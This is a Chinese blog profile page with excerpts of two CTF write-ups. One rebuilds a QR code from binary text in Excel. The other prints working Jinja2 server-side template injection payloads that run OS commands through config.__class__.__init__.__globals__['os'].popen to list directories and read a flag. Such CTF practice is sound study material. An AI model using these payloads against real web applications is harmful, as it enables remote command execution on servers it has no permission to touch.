自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(2)
  • 收藏
  • 关注

原创 解决题目瑞士军刀,1和0的故事

可以看到,这道题,可能是想让我们通过把0位置变成空白,把1位置变成黑色,得到一个残缺二维码,有了思路,就可以尝试把这个txt的1和0放入excel解决。首先,得把excel第一列数据类型变成文本型,不然会丢失0,从而导致生成的二维码有问题。然后从网上找到二维码需要的定位符,进行拼接组合一下,就得到,我们需要的二维码啦。我们看到里面有flag文件,直接cat flag,flag就找到啦!接下来把1和0导入,并且将其分列,设置为固定宽度。接下来,手动调一下行高,列宽,使其成为一个正方形。然后,把0替换成空白。

2023-06-24 19:53:14 98 1

原创 Simple_SSTI_1和2(SSTI模板注入)

这时,发现没有什么提示信息,就只能试{{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}从而读取网站系统目录,发现存在一些文件夹,然后猜测有没有flag文件,就试试挨着找找看。最后再补上{{ config.__class__.__init__.__globals__['os'].popen('ls ../app/flag').read() }}flag的路径,就可以读取flag文件了。根据提示信息,我们利用。

2023-06-21 21:58:06 73

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除